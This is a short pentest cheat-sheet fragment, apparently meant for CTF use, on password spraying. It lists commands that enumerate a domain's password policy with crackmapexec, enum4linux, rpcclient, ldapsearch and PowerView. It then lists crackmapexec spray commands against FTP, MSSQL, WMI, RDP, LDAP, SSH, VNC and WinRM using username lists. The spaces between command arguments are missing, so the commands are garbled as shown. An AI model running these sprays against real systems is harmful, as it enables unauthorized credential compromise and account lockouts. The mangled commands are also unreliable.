Once you check the target's password policy, it might be beneficiary to run a password spray to get successful user/password combinations. Especially useful in CTF environment.
# From Linuxcrackmapexec<IP>-u'user'-p'password'--pass-polenum4linux-u'username'-p'password'-P<IP>rpcclient-U""-N10.10.10.10; rpcclient $>querydominfoldapsearch-h10.10.10.10-x-b"DC=DOMAIN_NAME,DC=LOCAL"-ssub"*"|grep-m1-B10pwdHistoryLength# From Windowsnetaccounts(Get-DomainPolicy)."SystemAccess"#From powerview
Execution
# Use My own script# qspraynmap/all.nmap# crackmapexec !cmeftp $RHOST -uusernames.txt-pusernames.txt--continue-on-successcmemssql $RHOST -uusernames.txt-pusernames.txt--continue-on-successcmewmi $RHOST -uusernames.txt-pusernames.txt--continue-on-successcmerdp $RHOST -uusernames.txt-pusernames.txt--continue-on-successcmeldap $RHOST -uusernames.txt-pusernames.txt--continue-on-successcmessh $RHOST -uusernames.txt-pusernames.txt--continue-on-successcmevmc $RHOST -uusernames.txt-pusernames.txt--continue-on-successcmewinrm $RHOST -uusernames.txt-pusernames.txt--continue-on-success